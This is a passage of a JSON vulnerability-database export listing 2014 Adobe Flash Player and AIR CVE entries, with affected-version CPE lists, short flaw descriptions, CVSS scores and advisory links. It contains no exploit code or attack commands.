"cpe:/a:adobe:flash_player:11.2.202.327", "cpe:/a:adobe:adobe_air:3.1.0.488", "cpe:/a:adobe:adobe_air_sdk:3.5.0.600", "cpe:/a:adobe:flash_player:11.7.700.257", "cpe:/a:adobe:adobe_air:1.5", "cpe:/a:adobe:flash_player:11.3.300.257", "cpe:/a:adobe:flash_player:11.7.700.252", "cpe:/a:adobe:flash_player:11.2.202.251", "cpe:/a:adobe:adobe_air_sdk:4.0.0.1628", "cpe:/a:adobe:flash_player:11.9.900.152", "cpe:/a:adobe:flash_player:11.9.900.117", "cpe:/a:adobe:flash_player:11.1", "cpe:/a:adobe:adobe_air:1.0.1", "cpe:/a:adobe:flash_player:11.2.202.280", "cpe:/a:adobe:flash_player:11.2.202.235", "cpe:/a:adobe:flash_player:11.5.502.135", "cpe:/a:adobe:flash_player:11.2.202.341", "cpe:/a:adobe:adobe_air:1.1.0.5790", "cpe:/a:adobe:adobe_air:2.7.0.1948", "cpe:/a:adobe:flash_player:11.7.700.169", "cpe:/a:adobe:flash_player:11.2.202.297", "cpe:/a:adobe:flash_player:11.2.202.233", "cpe:/a:adobe:adobe_air:2.5.1.17730", 
"cpe:/a:adobe:adobe_air:3.7.0.1530", "cpe:/a:adobe:flash_player:11.4.402.265", "cpe:/a:adobe:flash_player:11.6.602.171"], "id": "CVE-2014-0507", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0507", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:adobe:flash_player:11.2.202.243:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.9.0.1030:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:2.6:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.3.300.268:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.7.700.232:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.341:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:3.9.0.1380:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.1.115.48:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.5.502.149:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:3.8.0.1430:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.9.900.152:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.7.700.169:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.291:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.273:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:3.4.0.2710:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.1.102.55:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:3.7.0.1530:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.9.0.1060:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:2.5.0.16600:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.1.115.34:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:2.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.5.0.600:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:2.7:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.4.402.287:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:1.5.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.8.800.97:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.3.300.270:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.8.0.870:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.3.300.273:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:3.8.0.910:*:*:*:*:*:*:*", 
"cpe:2.3:a:adobe:flash_player:11.7.700.260:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.8.0.910:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.346:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.0.1.153:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:12.0.0.43:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:2.7.1.19610:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.332:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:3.3.0.3690:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:3.5.0.890:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:2.7.0.19480:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.2.0.2070:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:1.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.280:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.7.700.242:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.6.602.180:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.8.800.168:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.335:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.3.300.262:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.327:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:1.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:3.5.0.600:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:1.5.1.8210:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.270:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.235:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.6.602.168:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.5.502.135:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.5.502.110:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:2.6.0.19120:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:3.2.0.2070:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.1.0.488:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:3.4.0.2540:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.1.115.7:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.1.111.54:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:1.0.4990:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.1.111.50:*:*:*:*:*:*:*", 
"cpe:2.3:a:adobe:flash_player:11.9.900.117:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.6.0.6090:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.5.502.136:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.2.0.207:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.3.300.257:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.6.602.167:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.236:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:3.0.0.4080:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:2.7.0.1953:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.6.0.597:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.1.115.58:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.285:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:1.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.7.700.252:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.7.700.224:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:4.0.0.1390:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.258:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.1.102.63:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:4.0.0.1628:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:12.0.0.38:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.6.602.171:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.228:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:1.5.3.9130:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:3.9.0.1030:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.7.700.257:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.238:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.336:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.4.402.265:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.251:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.310:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.8.800.94:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:3.6.0.6090:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.3.0.3670:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.9.0.1210:*:*:*:*:*:*:*", 
"cpe:2.3:a:adobe:flash_player:11.4.402.278:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.1.102.62:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:3.1.0.488:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:3.5.0.880:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.0.1.152:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.1.111.8:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:2.7.0.1948:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.275:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:1.1.0.5790:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:3.7.0.2090:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:2.0.3.13070:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:3.5.0.1060:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.5.0.890:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:2.5.1.17730:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.1.0.4880:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:3.9.0.1210:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:1.0.8.4990:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.1.102.59:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:1.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.4.0.2710:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.233:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:2.7.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:2.0.2.12610:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.3.300.271:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:1.5.0.7220:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:2.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.9.900.170:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.5.0.880:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:2.7.0.19530:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.3.300.265:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.7.0.1860:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:4.0.0.1390:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:3.7.0.1860:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:2.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.297:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.0:*:*:*:*:*:*:*", 
"cpe:2.3:a:adobe:adobe_air:1.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.7.700.202:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:3.3.0.3650:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.0.0.4080:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:3.8.0.870:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.1.111.44:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.5.502.146:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.7.0.1530:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.5.0.1060:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.9.0.1380:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.1.0.485:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.1.115.54:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.261:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:2.6.0.19140:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:1.5:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.4.0.2540:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.223:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:3.6.0.599:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:1.5.3.9120:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.262:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.7.0.2090:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:12.0.0.41:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.0.0.408:*:*:*:*:*:*:*"]}, {"lastseen": "2023-09-20T14:02:22", "description": "Adobe Flash Player before 11.7.700.272 and 11.8.x through 12.0.x before 12.0.0.77 on Windows and OS X, and before 11.2.202.346 on Linux, allows attackers to read the clipboard via unspecified vectors.", "cvss3": {}, "published": "2014-03-12T05:15:00", "type": "cve", "title": "CVE-2014-0504", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": 
"NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0504"], "modified": "2018-12-13T16:00:00", "cpe": [], "id": "CVE-2014-0504", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0504", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": []}, {"lastseen": "2023-09-20T13:43:34", "description": "Stack-based buffer overflow in Adobe Flash Player before 11.7.700.269 and 11.8.x through 12.0.x before 12.0.0.70 on Windows and Mac OS X and before 11.2.202.341 on Linux, Adobe AIR before 4.0.0.1628 on Android, Adobe AIR SDK before 4.0.0.1628, and Adobe AIR SDK & Compiler before 4.0.0.1628 allows attackers to execute arbitrary code via unspecified vectors.", "cvss3": {}, "published": "2014-02-21T05:06:00", "type": "cve", "title": "CVE-2014-0498", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0498"], "modified": "2018-12-13T15:54:00", "cpe": [], "id": "CVE-2014-0498", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0498", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": []}, {"lastseen": "2023-09-20T13:56:13", "description": "Use-after-free vulnerability in Adobe Flash Player before 11.7.700.275 and 11.8.x through 13.0.x before 13.0.0.182 on Windows and OS X and before 11.2.202.350 on Linux, Adobe 
AIR before 13.0.0.83 on Android, Adobe AIR SDK before 13.0.0.83, and Adobe AIR SDK & Compiler before 13.0.0.83 allows remote attackers to execute arbitrary code, and possibly bypass an Internet Explorer sandbox protection mechanism, via unspecified vectors, as demonstrated by VUPEN during a Pwn2Own competition at CanSecWest 2014.", "cvss3": {}, "published": "2014-03-27T10:55:00", "type": "cve", "title": "CVE-2014-0506", "cwe": ["CWE-399"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0506"], "modified": "2017-12-16T02:29:00", "cpe": ["cpe:/a:adobe:flash_player:12.0.0.77"], "id": "CVE-2014-0506", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0506", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:adobe:flash_player:12.0.0.77:*:*:*:*:*:*:*"]}, {"lastseen": "2023-09-20T14:02:54", "description": "Adobe Flash Player before 11.7.700.272 and 11.8.x through 12.0.x before 12.0.0.77 on Windows and OS X, and before 11.2.202.346 on Linux, allows remote attackers to bypass the Same Origin Policy via unspecified vectors.", "cvss3": {}, "published": "2014-03-12T05:15:00", "type": "cve", "title": "CVE-2014-0503", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", 
"baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0503"], "modified": "2018-12-13T16:00:00", "cpe": [], "id": "CVE-2014-0503", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0503", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}, "cpe23": []}, {"lastseen": "2023-09-20T13:46:35", "description": "Double free vulnerability in Adobe Flash Player before 11.7.700.269 and 11.8.x through 12.0.x before 12.0.0.70 on Windows and Mac OS X and before 11.2.202.341 on Linux, Adobe AIR before 4.0.0.1628 on Android, Adobe AIR SDK before 4.0.0.1628, and Adobe AIR SDK & Compiler before 4.0.0.1628 allows remote attackers to execute arbitrary code via unspecified vectors, as exploited in the wild in February 2014.", "cvss3": {}, "published": "2014-02-21T05:07:00", "type": "cve", "title": "CVE-2014-0502", "cwe": ["CWE-399"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0502"], "modified": "2018-12-13T15:55:00", "cpe": [], "id": "CVE-2014-0502", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0502", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": []}], "ubuntucve": [{"lastseen": "2023-09-21T07:10:04", "description": "Buffer overflow in Adobe Flash Player before 11.7.700.279 and 11.8.x\nthrough 13.0.x before 13.0.0.206 on Windows and OS 
X, and before\n11.2.202.356 on Linux, allows remote attackers to execute arbitrary code\nvia unspecified vectors, as exploited in the wild in April 2014.", "cvss3": {}, "published": "2014-04-29T00:00:00", "type": "ubuntucve", "title": "CVE-2014-0515", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0515"], "modified": "2014-04-29T00:00:00", "id": "UB:CVE-2014-0515", "href": "https://ubuntu.com/security/CVE-2014-0515", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-09-21T08:16:23", "description": "Adobe Flash Player before 11.7.700.275 and 11.8.x through 13.0.x before\n13.0.0.182 on Windows and OS X and before 11.2.202.350 on Linux, Adobe AIR\nbefore 13.0.0.83 on Android, Adobe AIR SDK before 13.0.0.83, and Adobe AIR\nSDK & Compiler before 13.0.0.83 allow attackers to bypass intended access\nrestrictions and obtain sensitive information via unspecified vectors.", "cvss3": {}, "published": "2014-04-08T00:00:00", "type": "ubuntucve", "title": "CVE-2014-0508", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, 
"obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0508"], "modified": "2014-04-08T00:00:00", "id": "UB:CVE-2014-0508", "href": "https://ubuntu.com/security/CVE-2014-0508", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-09-21T09:45:31", "description": "Stack-based buffer overflow in Adobe Flash Player before 11.7.700.269 and\n11.8.x through 12.0.x before 12.0.0.70 on Windows and Mac OS X and before\n11.2.202.341 on Linux, Adobe AIR before 4.0.0.1628 on Android, Adobe AIR\nSDK before 4.0.0.1628, and Adobe AIR SDK & Compiler before 4.0.0.1628\nallows attackers to execute arbitrary code via unspecified vectors.", "cvss3": {}, "published": "2014-02-21T00:00:00", "type": "ubuntucve", "title": "CVE-2014-0498", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0498"], "modified": "2014-02-21T00:00:00", "id": "UB:CVE-2014-0498", "href": "https://ubuntu.com/security/CVE-2014-0498", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-09-21T08:16:10", "description": "Cross-site scripting (XSS) vulnerability in Adobe Flash Player before\n11.7.700.275 and 11.8.x through 13.0.x before 13.0.0.182 on Windows and OS\nX and before 11.2.202.350 on Linux, Adobe AIR before 13.0.0.83 on Android,\nAdobe AIR SDK before 13.0.0.83, and Adobe AIR SDK & Compiler before\n13.0.0.83 allows remote attackers to inject arbitrary web script or HTML\nvia unspecified vectors.", "cvss3": {}, "published": "2014-04-08T00:00:00", "type": 
"ubuntucve", "title": "CVE-2014-0509", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0509"], "modified": "2014-04-08T00:00:00", "id": "UB:CVE-2014-0509", "href": "https://ubuntu.com/security/CVE-2014-0509", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-09-21T08:16:41", "description": "Buffer overflow in Adobe Flash Player before 11.7.700.275 and 11.8.x\nthrough 13.0.x before 13.0.0.182 on Windows and OS X and before\n11.2.202.350 on Linux, Adobe AIR before 13.0.0.83 on Android, Adobe AIR SDK\nbefore 13.0.0.83, and Adobe AIR SDK & Compiler before 13.0.0.83 allows\nattackers to execute arbitrary code via unspecified vectors.", "cvss3": {}, "published": "2014-04-08T00:00:00", "type": "ubuntucve", "title": "CVE-2014-0507", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0507"], "modified": "2014-04-08T00:00:00", "id": "UB:CVE-2014-0507", "href": "https://ubuntu.com/security/CVE-2014-0507", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-09-21T09:55:43", 
"description": "Adobe Flash Player before 11.7.700.269 and 11.8.x through 12.0.x before\n12.0.0.70 on Windows and Mac OS X and before 11.2.202.341 on Linux, Adobe\nAIR before 4.0.0.1628 on Android, Adobe AIR SDK before 4.0.0.1628, and\nAdobe AIR SDK & Compiler before 4.0.0.1628 do not prevent access to address\ninformation, which makes it easier for attackers to bypass the ASLR\nprotection mechanism via unspecified vectors.", "cvss3": {}, "published": "2014-02-21T00:00:00", "type": "ubuntucve", "title": "CVE-2014-0499", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:C/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0499"], "modified": "2014-02-21T00:00:00", "id": "UB:CVE-2014-0499", "href": "https://ubuntu.com/security/CVE-2014-0499", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2023-09-21T09:17:32", "description": "Adobe Flash Player 